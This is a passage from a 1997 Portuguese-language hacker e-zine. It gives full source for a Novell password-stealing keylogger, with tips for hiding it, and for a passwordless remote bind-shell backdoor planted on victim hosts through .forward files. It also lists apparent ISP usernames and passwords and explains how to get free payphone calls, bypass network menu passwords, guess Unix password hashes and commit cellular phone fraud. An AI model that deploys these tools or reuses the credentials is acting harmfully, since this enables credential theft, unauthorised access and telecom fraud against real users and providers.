sequencia e' ignorado. Entao pegamos uma calculadora qualquer e digitamos estes numeros, pra logo depois converter pra HEXADECIMAL... simple uh? ;) Continuarei a escrever sobre celular, nao pense que com estes dados vc esta apto a fazer escuta ou mesmo clonagem, mas server como uma boa in- troducao de um contexto que seguiremos escrevendo sobre a telefonia ce- lular. Mas depois que vcs pegarem bem estes esquemas de programacao o resto vai ficar FACIL demais!! OBS: Nao me responsabilizo se a sua namorada aparecer gravida ou se seu cachorro comer veneno, muito menos se amanha vc acordar com uma espinha gigante na testa. ;) AciDmuD - Global Domination Inc. (c) 1997 }-===============================[chain]===============================-{ 3-) GEOCITIES - Verdades e Mentiras ~~~~~~~~~ ~ ~~~~~~~~ ~ ~~~~~~~~ Well, uma pequena materia 'light' pra voce dar um tempo pra cabeca. Recentemente, recebemos uma mensagem de um endereco um tanto suspeito: alert@geocities.com. Antes mesmo de ler a mensagem, apenas por instinto, ja' diziamos: 'Bosta, de novo!'. O texto da mensagem era o mesmo que das outras vezes. O geocities tinha fodido com nossa pagina. Porra! E' a ter- ceira ou quarta pagina minha que eles retiram daqueles 'nanocomputers' porcos deles. Depois de deletar aquele mail estupido pensamos: mas por qual motivo eles fizeram isso? Bom, temos 5 hipoteses para explicar tal atitude. 1- Algum cara muito cagao, que foi abusado sexualmente pelos pais quando era crianca, que desenvolveu um tipo de 'agoraphobia' (medo de tudo quan- to e' merda) e que sai de casa 2 vezes a cada 5 meses, ficou preocupado com a possibilidade de ver sua senha publicada em uma revista hacker que e' lida por milhares de pessoas em toda a internet e mandou uma pequena mensagem para o encarregado la' no geocities dizendo que nos eramos uma ameaca aos bons costumes. 2- Algum adolescente porco e cheio de espinhas, que tem idade mental de mais ou menos 8 anos, que ainda e' vestido pela mae e que ganhou aquele pentium 200MHZ do pai, no dia da crianca, apenas para jogar campo minado, ficou assustado com nossa linguagem politicamente incorreta e com aqueles graficos dos 'monstrinhos' encontrados em nossa pagina e entrou em conta- to com a administracao do geocities. Possivelmente, na cabeca de um ser tao despresivel como esse, possa ter surgido a ideia de que nos somos se- questradores ou assassinos, que a qualquer momento pode bater na casa de- le, estuprar sua irma, queimar os seus pais e , por fim, cortar as partes do corpo dele e jogar para os cachorros que certamente nao iriam comer sua carne fetida e nojenta. 3- Outra hipotese: algum fanatico por algum outro zine brasileiro, tipo o Dr_Zebron (a exemplo do AciDmuD utilizei um nome ficticio para que nao seja possivel identificar o verdadeiro Dr_Epron), ficou meio 'magoado' por causa do nosso zine ter surgido e mostrado realmente o que as pessoas querem ver e simplesmente mandou um mail para o geocities dizendo que nos estavamos atrapalhando o plano deles, que era de criar no brasil um grupo de usuarios de computadores completamente retardados que soubessem apenas a teoria de alguns assuntos inuteis, nada de pratica ou coisas que real- mente interessam. Lembre-se: nao estou acusando o Dr_Zebron de foder com nossa pagina, apenas citei o infeliz porque ele se encaixa perfeitamente no perfil do idiota descrito anteriormente. Outra coisa: tambem sabemos que o pessoal responsavel por alguns outros zines (tipo o NetHack) e' tu- do gente boa e nao faria uma merda dessas. 4- Mais uma suspeita: algum usuario que nao ficou muito feliz quando viu sua senha publicada nos primeiros numeros da revista avisou o geocities e os babacas fizeram um 'take down' na nossa conta. Agora responda: nos temos culpa se este tipo de usuario escolhe o login e a senha igual? Nos temos culpa se este tipo de usuario usa um login com 15 letras e o passwd com 2 numeros? Porra, vao se foder! As vezes ate' nem e' culpa do usuario e sim do Sysadmin que nao avisa esse tipo de coisa. OPZ! Quem sabe nao foi um sysadmin muito cagao, daqueles que, para protegerem o sistema, desligam as maquinas da tomada? Quem sabe... 5- E, por fim, a ultima suspeita. Conhecemos muito bem a politica daquela merda do geocities. Talvez, sem mais nem menos, algum bicho muito estupi- do que trabalha naquela porcaria achou melhor retirar nossa pagina do ar porque o geocities tem um nome a zelar e ficaria mal hospedando a pagina de um zine que publica materias verdadeiramente underground. E', o negocio e' mais ou menos esse. O geocities so' quer saber de uma coisa: se sua pagina nao faz sucesso, eles acham um meio de retirar ela de la'; se sua pagina e' bastante acessada eles colocam propaganda nela e, caso isso ocorra, com quem voce acha que fica o dinheiro da publicida- de? No entanto, se for uma pagina hacker, warez ou de sexo eles retiram na mesma hora, nao interessa se sejam apenas links ou se tem 100000 ou 10 acessos. Agora pense em uma coisa: quando que uma pagina pessoal que seja composta de informacoes sobre o autor, tipo... "Meu nome e' Merdeval, tenho 16 anos, gosto de futebol e sou esportista pois faco aerobica e bale classico. O que voce acho da minha pagina? Me mande um mail. Under Construction!" ... vai receber mais de 100 acessos? So' um retardado visita um lixo des- ses! Nos estamos apenas mostrando que as coisas nao sao como parecem. Agora, estamos registrando um dominio onde o espaco em disco e o fluxo de dados e' ilimitado e la' o negocio vai pegar fogo porque nos nao vamos pensar duas vezes antes de abarrotar o disco com arquivos h/p/c/a/v/w ou foder com a vida de um bando de idiotas inuteis. Portanto... Take it easy DwDs! VooDoo - Global Domination Inc. (c) 1997 }-===============================[chain]===============================-{ 4-) MiSC & UTILz ~~~~ ~ ~~~~~ 1- Como retirar a senha da porra da Lantastic 6.0 ---------------------------------------------- Como ja sabemos a Lantastic 6.0 e' considerada a melhor rede ponto-a-ponto do mercado, mas descobri um erro banal, onde voce pode ter acesso ao net_mgr que e' o programa onde se tem controle total de usuarios e restri- coes. Ai vai, Localize dentro do diretorio LANTASTI.NET o subdir SYSTEM.NET, dentro des- te subdir voce encontrara o arquivo com nome Zcontrol. Agora e' so renomear este arquivo e pronto, voce tirou a senha do net_mgr da Lantastic 6.0 2-Senha de alguns provedores do Triangulo Mineiro ----------------------------------------------- Triangulo Internet Provider (034)2395222 ---------------------------- werneck - Amazonia helena - helena cultura - 1pizza Nanet (034)2390001 --------- diasatac - dias favigo - blf316066 AlgarNet (034)2142000 ---------- cto5 - pass37 Agradecimento especial a SEAL 3-Ligando em telefone com cartao sem pagar ---------------------------------------- Como ligar gratuitamente em orelhoes a cartao Ok, os cartoes desse tipo de orelhao, funcionam da seguinte forma: Eles sao formados por minusculos microfusiveis queimados por indutancia, assim, quando vc insere o cartao no orelhao, atraves de um "sensor", ele verefica quantos microfusiveis ainda estao "ligados". Quando vc conhece algo, vc pode engana-lo, entao, um metodo q tem funcionado por quase to- do brasil, eh o de vc pegar o seu cartao, e "pinta-lo" com um lapis comum. A coisa funciona assim: O grafite eh um semi condutor q se abre facilmente, entao ele conduz a corrente necessario, e o orelhao acha q vc tem um cartao completo!! :) -Complementado por AciDmuD- Pegar um cartao telefonico comum e passar um esmalte incolor ( base ) na tarja do cartao. Parece que esta base impede o cartao de "queimar" os creditos, o mesmo pode ser tentado em cartao de fliperama. Pinte a tarja de maneira que fique fina para impedir que o cartao fique grosso demais e nao passe na maquina. Worm_root - 1997(c) Global Domination Inc. 4- Codigo simples de criptografia de dados em Pascal ------------------------------------------------- Ainda sobre a materia anterior ai vai o codigo de um programa que pode auxiliar que quer se aprofundar no assunto, e no futuro quebrar uns mais dificeis. No futuro o Flash vai nos mandar a fonte em C, espera- mos que sim ;) ------------------------cut here---------------------------------------- { Codigo simples de criptografia de dados. Implementado por Flash. aver@visao.com.br } Uses Crt; Var Intext, OutText : Text; St : String; Pw : LongInt; Function Converttxt (S: String): String; Var X : Byte; Begin Converttxt [0] := S [0]; For X := 1 To Length (S) Do Converttxt [X] := Chr (Ord (S [X] ) XOr (Random (128) Or 128) ); End; Function Enterpw: Integer; Var S : String; CH : Char; Z, Err : Integer; Begin Pw:= 0; Z := 1; S := ''; Write ('Chave : '); Repeat CH := UpCase (ReadKey); Case CH Of #8 : Begin If Z > 1 Then Begin Dec (Z); Delete (S, Z, 1); Write (CH); ClrEol; End; End; #13, #10, #27 : Begin WriteLn; WriteLn; Write ('Processing...'); End; Else Begin S:= S+ CH; Write ('þ'); Inc (Z); End; End; Until (CH = #13) Or (CH = #10) Or (CH = #27); If S = '' Then Begin WriteLn; TextColor (LightRed); WriteLn ('Erro: Chave invalida.... Exiting'); TextColor (LightGray); Halt (10); End; Val (S, Pw, Err); Enterpw:= Pw; End; Begin If ParamCount< 1 Then WriteLn ('Encrypt ') Else Begin Assign (Intext, ParamStr (1) ); {$I-} Reset (Intext); {$I+} If IOResult= 2 Then WriteLn ('Arquivo '+ ParamStr (1) + ' not found!') Else Begin Enterpw; RandSeed := Pw; Assign (OutText, ParamStr (2) ); Rewrite (OutText); While Not EoF (Intext) Do Begin ReadLn (Intext, St); WriteLn (OutText, Converttxt (St) ); If ParamCount> 1 Then Write ('.'); End; Close (Intext); Close (OutText); WriteLn; WriteLn ('Sucesso!!'); End; End; End. ------------------------cut here---------------------------------------- 5- Problemas com senha no SETUP do seu computador? ----------------------------------------------- Se alguem colocou senha pra acessar o computador e vc esta apavorado pq acha q nao tem como tirar, fique calmo. Teoricamente nao tem como acessa-la se o computador tranca na inicializa- cao e para ate a confirmacao da senha, mas sempre tem como faze-lo. Vc tem que abrir seu computador ( ou de que for ), localizar a pilha do clock e retira-la por uns 30 minutos. Com isso voce vai descarregar a me- moria. Logo apos coloque novamente e configure o setup denovo! Soh faca isso se vc estiver certo que sabe as configuracaos da maquina, pq elas vao voltar pro modo default. AciDmuD - Global Domination Inc. (c) 1997 }-===============================[chain]===============================-{ 5-) Diferenca de tempo em comunicacao via satelites (TASI) ~~~~~~~~~ ~~ ~~~~~ ~~ ~~~~~~~~~~~ ~~~ ~~~~~~~~~~~~~~~~ Eu sei q prometi uns codigos de virus e ensinar contaminacao de EXEs, no entanto, eu achei q seria mais interessante eu colocar outras materias do q virus, entao fica p/ a proxima edicao. Prometo! Bem, vc alguma vez ja ligou p/ um pais, tipo Japao, ou Italia? Vc ja perce- beu, q vc fala, e apenas algum tempo depois a pessoa do outro lado ouve o q vc falou? Isso ate prejudica a conversa.. Imagina so: - Oi! Como vc chama? - pergunta um cara na Italia - 10 anos - responde o outro falando de outra pergunta anterior - Onde vc mora? - Marcos - hehehe... a conversa fica muito confusa ne? O q ocorre, eh q um mesmo satelite, permite a mais de uma pessoa usar o mesmo trunk. Entao, para atender a mais de uma pessoa, quando o satelite percebe uma pessoa nao esta falando, ele atende a outra, entao nos temos X e Y num mesmo trunk; Quando X parou de falar, o satelite envia o que Y falou, e quando este parou de falar, ele volta p/ X. Assim, eh devido a essa lentidao em achar um trunk, e atender mais de uma pessoa, q ocorre aquela confusao, quando vc fala. Bem, mas existe um certa frequencia que quando emitida, permite a vc ter um trunk so seu!(q chique hein? :), e tambem impede q vc caia em um trunk que ja esta sendo usado. Basta que vc envia 1850 Hz. Mas isso deve ser feito antes da transmissao. Eu ainda nao consegui gerar essa frequencia, mas na proxima edicao eu apresento os resultados, caso vc consigam ou nao, me avisem. Pelo q eu sei, vc disca o numero, manda a frequencia antes de ouvir o som da chamada!! Vc deve dis- car e logo em seguida mandar o tom. P/ nao haver erros, eu recomendo q vc mande o tom antes de discar, apos discar, quando ouvir o tom de chamada e quando atender. Assim, com certeza nao havera erros! Note, que o numero que vc discar deve usar um satelite, em ligacoes internacionais diretas, vc sempre usa o 00, isto eh um conexao via satelite, entao em todo numero internacional q comece com 00, pode ser usado esse truque. Worm_root - 1997(c) Global Domination Inc. }-===============================[chain]===============================-{ 6-) Hacking Netware ~~~~~~~ ~~~~~~~ Thief eh um programa TSR escrito em assembly 8086 que tem por objetivo roubar senhas da Novell. Foi desenvolvido pelo pessoal da Washington High School em Denver, Colorado (veja como nos prezamos os direitos autorais). Raramente o supervisor percebera esse pequeno programa, a nao ser que vc seja muito burro p/ contar a ele. Eu recomendaria que vc apos rodar e car- regar o programa na memoria, o deletasse p/ impedir que alguem o descubra facilmente.. dessa forma o programa simplesmente ficara na memoria. Ok, o que programa fara eh simplesmente esperar pelo programa LOGIN, assim que ele for executado, o programa iniciara a gravar qualquer tecla pres- sionada em um arquivo escondido em alguma parte do HD. Entao, mais tarde vc volta la e simplesmente ve o que escreveram enquanto vc estava "fora" ;) Agora vamos ao "metabolismo" do programa. Supreendentemenete, THIEF usa a mesma interrupcao que o shell do Novell! Eh isso, ele captura a porta cen- tral do DOS, a famosa interrupcao 21h.* . Entao, ele assim intercepta TO- DAS as chamadas de funcoes. Especificamente, ele checa pela funcao EXEC do arquivo, e assim o "termina". Quando um arquivo chamar a funcao EXEC, e o nome do arquivo for LOGIN, THIEF ira "viver" e comecar a guardar toda e qualquer tecla pressionada, ate o programa terminar. Isso eh realmente in- teligente e sofisticados, mas ao inves disso, o programa poderia simples- mente esperar pela funcao especial da Novell p/ se logar, e somente guardar os parametros da chamada. Note que as tecnicas acima requerem que o progra- ma funcionar, seja carregado antes do shell da Netware. * A interrupcao 21h eh usada em qualquer programa que faz chamadas a s fun- coes do DOS. O sheel do Netware eh claro as intercepta. Assim, ela pode fa- zer as chamadas ao DOS, ou executa-las por si propria. Sinta-se livre p/ modificar o programa da forma q vc quiser, mesmo porq muitas vezes o drive usado pelo programa eh diferente do seu caso. ;--------------------------------corte aqui-------------------------------- ; ; Thief - Capturador de senhas Novell ; Copyright (c) - Washington High School ; ; Thief v.1.0 ; cseg segment assume cs:cseg,ds:cseg org 100h public oi21,ac,ob,fn,fh,flag,ni21,jtov,oc,lethro,wpwtf,exist,create, public cntr,lits,begin .RADIX 16 start: push cs push cs push cs pop ds pop es mov ax,0fffeh CLI pop ss mov sp,ax STI jmp begin oi21 dd ? ac dw 0 ob dw 80h dup (?) buff2 db 80h dup (?) fn db 'c:\testing',0FF,'.tmp',0 search1 db 'LOGIN' foundf db 0 fh dw 0 flag db 0 cntr dw 0 ni21: assume cs:cseg,ds:nothing,es:nothing cmp ax,4b00h je exec cmp foundf,0ffh jne nc cmp ah,8 je oc cmp ah,7 je oc nc: push ax mov al,cs:flag not al cmp al,0 jne jtov mov ax,cntr inc ax mov cntr,ax cmp ax,31h jb jtov xor ax,ax mov cntr,ax mov flag,al pop ax pushf call dword ptr [oi21] push ds push cs pop ds push ax push bx push cx push dx jmp short wpwtf jtov: pop ax jmp dword ptr cs:[oi21] exec: call scanfor jmp nc oc: pushf call dword ptr cs:[oi21] assume ds:cseg push ds push cs pop ds push ax push bx push cx push dx mov bx,ac mov [bx],al inc bx mov [ac],bx cmp al,0dh jne lethro mov byte ptr [bx],0ah not cs:[flag] lethro: pop dx pop cx pop bx pop ax pop ds iret scanfor: push ax push di push si push es push ds push cs push cs pop es mov si,dx mov di,offset buff2 moveit: lodsb and al,0dfh stosb or al,al jnz moveit pop ds mov di,offset buff2 look: push di mov si,offset search1 mov cx,5 repe cmpsb pop di or cx,cx jz foundit inc di cmp byte ptr [di+5],0 je not_found jmp look not_found: xor ax,ax mov foundf,al jmp short endofsearch foundit: mov ax,0ffh mov foundf,al endofsearch: pop ds pop es pop si pop di pop ax ret wpwtf: mov ax,3d02h mov dx,offset fn pushf call dword ptr [oi21] jnc exist cmp al,2 je create jmp lethro create: mov ah,3ch mov dx,offset fn mov cx,02h+04h pushf call dword ptr [oi21] jnc exist jmp lethro exist: mov fh,ax mov bx,ax mov ax,4202h xor cx,cx xor dx,dx pushf call dword ptr[oi21] mov cx,[ac] mov dx,offset ob sub cx,dx mov [ac],dx inc cx mov bx,fh mov ah,40h pushf call dword ptr [oi21] mov ah,3eh mov bx,fh pushf call dword ptr [oi21] jmp lethro lits db 90h begin: mov ax,offset ob mov [ac],ax mov ax,3521h int 21h mov di,offset oi21 mov [di],bx mov [di+2],es mov dx,offset ni21 push cs pop ds mov ax,2521h int 21h mov dx,offset lits int 27h cseg ends end start ; -------------------------------- FiM ------------------------------------ P.s.: O codigo esta meio confuso mas com certeza da pra "pegar" o que o bicho faz. Worm_root - 1997(c) Global Domination Inc. }-===============================[chain]===============================-{ 7-) The Hacker Shell Client & Server - by Oluparun ~~~ ~~~~~~ ~~~~~ ~~~~~~ ~ ~~~~~~ ~ ~~ ~~~~~~~~ Na maioria dos provedores, e mesmo em muitas universidades, os usuarios nao tem acesso shell, sendo que os sysadmins normalmente impedem os aces- sos rlogin e telnet, seja via filtragem em firewalls, colocando logins scripts com grampos (e.g. .profile, .cshrc, etc) ou mesmo desabilitando o servico diretamente no inetd (/etc/inetd.conf). Impossivel abrir um shell num lugar desses? Pode ser que pros irc-script -lamers que vao ao #HackerS realmente seja. Para se entrar em qualquer server so sao necessarias 3 coisas (anote ai): 1) Conhecimento; 2) Alguns neuronios funcionando; 3) Paciencia, muita paciencia... Mesmo nos servers mais fechados, pelo menos os seguintes servicos sempre estao disponiveis: - WWW (PORT 80/TCP) - SMTP (PORT 25/TCP) <--- LaMaHelp: isso aqui e' mail... - FTP (PORT 20 e 21/TCP) Sem tornar essa discussao uma lista de bugs/exploits (para isso va no hotbot e faca search=bugtraq) o problema aqui e': 1) Como abrir uma shell em uma conta em voce nem mesmo sabe a senha; 2) Como abrir uma shell usando a SUA propria conta caso o root tenha impe- dido o acesso; Se voce conseguir executar o programa servidor que eu desenvolvi (hackshd) voce tera acesso a uma shell SEM que seja necessaria senha. Vamos ver exem- plos de uso para cada um dos casos: 1) Suponha que voce conseguiu montar via NFS o diretorio HOME de um usuario com direito de gravacao (export para anonymous) mas ao tentar usar acesso via rlogin (para isso so seria necessario criar um arquivo .rhosts con- tendo "+ +") voce descobre que o rlogin esta desabilitado (o que e mais comum). Basta voce fazer o seguinte: a) Gravar o programa hackshd.c no diretorio do usuario; b) Criar no HOME dir do usuario um .forward com o seguinte conteudo: |"cc -o hackshd hackshd.c" |"chmod a+x hackshd" |"./hackshd" c) mandar um mail pro usuario com qualquer mensagem. Ao ser recebido o mail, o programa sera compilado e executado. d) Dai e so voce se conectar ao host usando o programa client hacksh. hacksh vitima.com.br e) Caso voce NAO tenha UNIX (meus pesames), voce pode acessar via TEL- NET usando o port 6666: telnet vitima.com.br 6666 Mesmo com TELNET sendo filtrado por firewall isso funciona, pois o PORT usado e' diferente do TCP/23 padrao. A ma' noticia e que o tel- net entra em raw mode e manda um CR/LF apos cada ENTER, e o UNIX es- pera apenas um LF. A solucao neste caso e mandar um ; (ponto-e-virgula) apos cada comando, como no exemplo: ls -la ; O comando LS e' executado e depois aparece uma mensagem de erro, mas nem ligue para isso... 2) Suponha que voce tem conta no servidor mas so tem acesso FTP pra fazer download/upload de arquivos. Entre com seu usuario/senha e no SEU dire- torio (geralmente neste caso os clientes FTP sao restritos a apenas ao proprio home dir) crie o .forward conforme descrito anteriormente, mande um mail pra voce mesmo e ... abre-te sesamo! OBSERVACOES: 1) NAO SE ESQUECA de deletar o .forward ou voce NUNCA mais recebera um mail... 2) Por questao de simplicidade, o programa apresentado nao usa pseudo-tty (pty) isso nao importa desde que voce nao queira exe- cutar comandos full-screen, tipo MAN. Caso voce tente executar um programa desse tipo, o server vai pendurar... 3) Por mais dificil que isso possa parecer para alguns, NAO SEJA LAMER... Delete o fonte apos compilar o programa... Voce pode ate incluir uma linha com um |"rm hackshd.c" no .forward. Me- lhor ainda, use um nome menos chamativo para o server...algo tipo x, teste, ..., etc 4) A melhor forma de finalizar o server e mandar um comando "exit". Apos isso, o proximo comando que voce digitar ira encerrar a co- nexao. NAO encerre a conexao a forca (tipo CTRL-C, etc) ou o server ira terminar com CORE e isso fica na LOG do sistema... Bem... Por hoje e'so'isso...caso voce tenha, gostado mande um mail pro AciD- muD e se eu puder eu volto a escrever... Aqui esta o servidor: /*-----------------------------------------------------------------------*/ /* Programa: HACKSHD.C */ /* Funcao..: Servidor que permite abrir um shell sem a necessidade */ /* de usuario ou senha, atendendo a conexoes no PORT TCP */ /* especificado em NUMPORT. */ /* */ /*------------------ Oluparun, ThE //\\//\\aStEr oF ||=||eLL - Fev/97 --*/ #include #include #include #include #include #include #define NUMPORT 6666 /* Numero do PORT atendido pelo server */ /*-----------------------------------------------------------------------*/ main() { int insock, conec, c; struct sockaddr_in cli_addr, serv_addr; /*----- Como este pgm executa remotamente, nenhum erro e verificado ----*/ conec = accept( insock, (struct sockaddr*) &cli_addr, &c); insock = socket(AF_INET, SOCK_STREAM,0); bzero( (char *) &serv_addr, sizeof(serv_addr) ); serv_addr.sin_family = AF_INET; serv_addr.sin_addr.s_addr = htonl(INADDR_ANY); serv_addr.sin_port = htons(NUMPORT); bind( insock, (struct sockaddr *) &serv_addr, sizeof(serv_addr) ); listen( insock, 1 ); /* Seta socket como passivo e fila =1 */ c = sizeof( cli_addr ); /*----------------------- Aguarda Conexoes ------------------------------*/ conec = accept( insock, (struct sockaddr*) &cli_addr, &c); dup2(conec,0); /* redireciona a STDIN pra conexao */ dup2(conec,1); /* idem para a STDOUT ... */ dup2(conec,2); /* e STDERR */ execl("/bin/sh","sh", 0); /* Abre-te Sesamo! :))) */ } <-------------------------------- CuT hErE --------------------------------> Para compilar o cliente use: cc -o hacksh hacksh.c Aqui esta o codigo client: /*-------------------------------------------------------------------------*/ /* Programa...: HACKSH.C */ /* Funcao.....: Cliente para acesso ao HackShell server (HACKSHD) */ /* Sintaxe ..: hacksh Server_Name */ /* Server_Name: Nome (ou IP address do Servidor) */ /* Port ......: Port servidor. default= 6666 */ /* */ /*-------------------- Oluparun, ThE //\\//\\aStEr oF ||=||eLL - Fev/97 --*/ #include #include #include #include #include #include #include #include #include #define PORT_SERVER 6666 /*---- Port default ---*/ extern int errno; /*-------------------------------------------------------------------------*/ /* EMULA - Emulador de terminal tty */ /*-------------------------------------------------------------------------*/ void emula (conec) int conec; { char tecla[2], in[2]; int lidos = 0; /* fcntl(conec, F_SETFL, O_NONBLOCK); */ switch ( fork() ) { case -1: /*--- Erro ---*/ printf("\nErro no Fork"); return; case 0: /*--- Processo FILHO ---*/ while (1) { if ( (lidos = read(conec, in, 1)) > 0 ) putchar(in[0]); else { if (lidos == 0) return; else { printf("\nErro na gravacao"); return; } } } default: /*--- Processo PAI ---*/ while (1) { tecla[0] = getchar(); if ( (write( conec, tecla, 1)) == -1) { perror("ERRO:"); printf("\nErro no write"); return; } /* if */ } /* while */ } /* case */ } /*-------------------------------------------------------------------------*/ /* MAIN - Cliente para o HackSHD */ /*-------------------------------------------------------------------------*/ int main( numarg, argv) int numarg; char **argv; { struct hostent *hp; struct sockaddr_in sin; short s, portnum = PORT_SERVER; char host[80]; numarg--; /* Acho que assim fica + logico... */ switch (numarg) { case 2: portnum = atoi(argv[2]); case 1: strcpy(host, argv[1]); break; default: printf("Sintaxe: hacksh server_name \n"); return(-1); } hp = gethostbyname( host ); /*------- Faz o GetHostByName ----------*/ if ( hp == 0 ) { perror ( "hacksh: gethostbyname" ); exit ( 1 ); } bzero ( &sin, sizeof ( sin ) ); bcopy ( hp->h_addr, &sin.sin_addr, hp->h_length ); sin.sin_family = hp->h_addrtype; sin.sin_port = htons( portnum ); s = socket ( AF_INET, SOCK_STREAM, 0 ); if ( s == -1 ) { perror ( "hacksh: socket" ); exit ( 1 ); } /*------------------- Conecta com o servidor ------------------------*/ if ( connect ( s, (struct sockaddr *) &sin, sizeof ( sin ) ) == -1 ) { perror ( "hacksh: connect" ); printf ( " - erro de connect status - %d ", errno ); exit ( 1 ); } emula ( s ); /*-------------------- CLOSE ( Socket ) -------------------------*/ close ( s ); /* Fecha Socket e termina... */ return(0); } BullshitDizclaimer: O que voce fizer com o que mostrei e da SUA inteira res- ponsabilidade Informacao nao e crime...crime e usa-la como um lamer... = SYNC =============== ThE Hacker Shell Client & Server ============= ETX = }-===============================[chain]===============================-{ 8-) Fraqueza do Point & Shoot ~~~~~~~~ ~~ ~~~~~ ~ ~~~~~ Seguinte, eu ja vi esse programa em varias redes, tipo Novell, computado- res pessoais entre outros. Para quem nao sabe ou nao esta associando o nome a pessoa, Point & Shoot eh um programa para criacao de menus, desen- volvidos por uns babacas de um empresa chamada Varteck Inc. O programa ate que eh legal, facil de usar... na maioria das vezes ele eh usado em redes de forma a tentar limitar o ascesso de usuarios, ou facilitar a vi- da de uns lamers. Bom, para os q ja viram esse programa, qualquer um pode simplesmente al- terar o menu, por exemplo, imagine na sua escola existem duas opcoes: 1- Windows 2- Logout Hehehe, imagine c vc inverter tudo?!? Bein, p/ dificultar isso, os desen- volvedores do programa incluiram um recurso no qual vc pode expecificar duas senhas com 2 objetivos, a primeira senha serve p/ podem alterar coi- sas gerais tipo cor, data, o q cada opcao ira fazer, segunda serve p/ impedir que vc possa sair do programa de menu. Note q muitas vezes, o programa estara sem senha, como caminho aberto p/ quem quiser zoar. Uma coisa legal, seria por exemplo, na sua escola tem Netware(Novell lamer!), e tem um opcao 3- Logout, vc poderia criar um simples programa, q alterasse A senha de todos usuarios p/ por exemplo "111", dessa forma, toda vez que um idiota fosse desligar o computador, teria sua senha alterada p/ 111!!! HEHE. Imagine a confusao, p/ vc -> Muitas contas p/ zoar, p/ o supervisor -> Muitas indas e vindas de SYSCON p/ alterar a senha dos infelizes. :) Bem, agora vou explicar como explorar a falha: Todo sistema de senha funciona basicamente da seguinte forma, quando vc cria uma conta, o programa precisa armazenar a sua conta, e a senha respec- tiva, eh assim q a coisa rola no Unix, Win95, e qualquer outro programa on- de vc tenha de informar uma senha. O q ocorre, eh q nesses programas, na MAIORIA DAS VEZES, o arquivo q contem a senha referente a sua conta esta criptografado... felizmente(hehe) isso nao ocorre no nosso amigo Point & Shoot. Portanto, tudo o q vc tem a fazer, eh ir no diretorio onde constam os arquivos do programa, e editar um arquivo chamado PS.CFG, la vc tera alguns parametros, e bem no meio da tela estara uma palavra de no maximo 8 caracteres; a senha necessaria para alterar o menu! ;) Se vc for burro e me dizer q vc nao consegue chegar ate esse arquivo pois para sair do menu eh preciso de senha, simplesmente chame o Windows(isso tem em toda rede!!) e la, de um shell p/ o DOS, ou simplesmente use o NOTEPAD. Worm_root - 1997(c) Global Domination Inc. }-===============================[chain]===============================-{ 9-) Shooting Shark's PW Hacker Update ~~~~~~~~ ~~~~~ ~ ~~ ~~~~~~ ~~~~~~ Tenho certeza q d muitos lamers bossais nao vao entender nem o titulo des- sa pequena maravilha... com, esse programa eh bem interessante.. ele fun- ciona assim: suponho q vc tenho um passwd e nele, tenho uma conta que lhe interesse, e vc sabe +- qual a senha, assim, vc pode usar esse arquivo pa- ra testar a senha, sem a necessidade de um crackeador especial. O programa ira lhe pedir 2 infos, a primeira eh a senha criptografada q vc pode ver no passwd, depois, ira lhe pedir a senha que vc acha q eh.. entao ele ira criptografa-la e comparar com a senha do passwd..legal mas cansativo.. co- mo eu ja disse, so eh bom utiliza-lo quando vc sabe +- qual a senha usada.. so se vc for um puta portugues vc vai usar isso aki p/ brute force!! Informacao tecnica(LAMERS OUT!) ~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~ Eh um programa simples de 20 linhas q pode ser compilado em qualquer sis- tema UNIX sem nenhum problema. Ele nao chama nenhum rotina externa, alem de crypt(), printf(), scanf(), strcmp() and exit(). crypt() eh absolutame- nte essencial ao programa!! - - - - - - - - - - - - - - - - corte aki - - - - - - - - - - - - - - - - - int len; char crbuf[30], *crypt(), *pw, pwbuf[10]; main() { printf("first, carefully type the ENCRYPTED password string:\n>"); scanf("%s",crbuf); printf("Now, type a password attempt at the prompt. type QUIT\n"); printf("(yes, in caps) on a blank line to quit...\n\n"); for (;;) { printf("try >"); scanf("%s",pwbuf); if (!strcmp(pwbuf,"QUIT")) break; pw = crypt(pwbuf,crbuf); if (!strcmp(pw,crbuf)) { printf(" ==> %s is correct.\n",pwbuf); exit(0); } } printf("done.\n"); } - - - - - - - - - - - - - - - - - corte aki - - - - - - - - - - - - - - - - - Worm_root - 1997(c) Global Domination Inc. }-===============================[chain]===============================-{ 10-) AJUDA & COLABORACAO DOS LEITORES!! ~~~~~ ~ ~~~~~~~~~~~ ~~~ ~~~~~~~~~~ AJUDA! ATENCAO: Bem, eu gostaria de pedir a ajuda e colaboracao dos lei- tores da revista. Eu, estou pesquisando atualmente a Telesp, e telefones a cartao, portante, eu gostaria de qualquer ajuda tal como termos utiliza- dos pelos tecnicos, descricao de programas usados por eles, numeros de te- lefones, qualquer coisa q vc considere realmente util! Ja quanto telefones a cartao, eu gostaria de entender como realmente eles funcionam, voltagens, cartao, free calls, TUDO! Vamos nos mobilizar e tentar entender nosso sis- tema telefonico. Qualquer informacao que vcs queiram me mandar e que achem interressante sera bem-vinda. Eu preciso de material bom.. ok? Se vc conhe- ce alguem da Telesp, troque um ideia, e me diga o q vc descobriu.. Eu sou contra os bons, isto eh, aqueles caras q descobrem algo e nao con- tam, eu acho q as informacoes tem de ser compartilhadas! Eh claro, nada de graca, mas poxa cara, imagine so, todos os phreakers brasileiros se mobili- zando em busca de uma unica informacao! Imagine so o q podemos descobrir? Notem q o meu objetivo nao apenas ligar sem pagar, eh ENTENDER COMO FUNCI- ONA! So fazer eh lamer, entender sim, eh ai q esta a arte. Qualquer informacao q vcs queiram me enviar sera bem vinda, independente do que for, qualquer ajuda eh bem vinda e sera publicada na revista! Informacoes podem ser enviadas para: worm_root@geocities.com Worm_root }-===============================[chain]===============================-{ 11-) Como conectar qualquer celular em um modem ~~~~ ~~~~~~~~ ~~~~~~~~ ~~~~~~~ ~~ ~~ ~~~~~ InTrOdUcAo: ~~~~~~~~~~ Os pares ESN/MIN sao relativamente faceis de descobrir, basta apenas ser cuidadoso, e manhoso suficiente, q em apenas algumas horas vc podera obter alguns. Bom, hoje em dia eh esta em moda fraudes telefones celulares, as ligacoes nao sao la muito boas, mas eu vejo da seguinte forma, eu prefiro passar 4 horas na Net, tentando puxar um arquivo inteiro via celular frauda- do, do q demorar apenas 1 com um fone normal, mesmo porq, os celulares frau- dados ainda lhe oferecem a oportunidade de discar p/ as BBSes, tipo LORE, do outro lado do mundo ;) (infelizmente eu nao tenho tempo($$) p/ comprar um celular... c alguem puder me dar um eu agradeco ;) Esse texto vai te explicar como conectar o seu celular com o seu modem, sem a necessidade de ter q com- prar aquela porra do adaptador ou qualquer outro tipo de interface q nao eh la muito barato. ATENCAO: Um pequeno pedido, 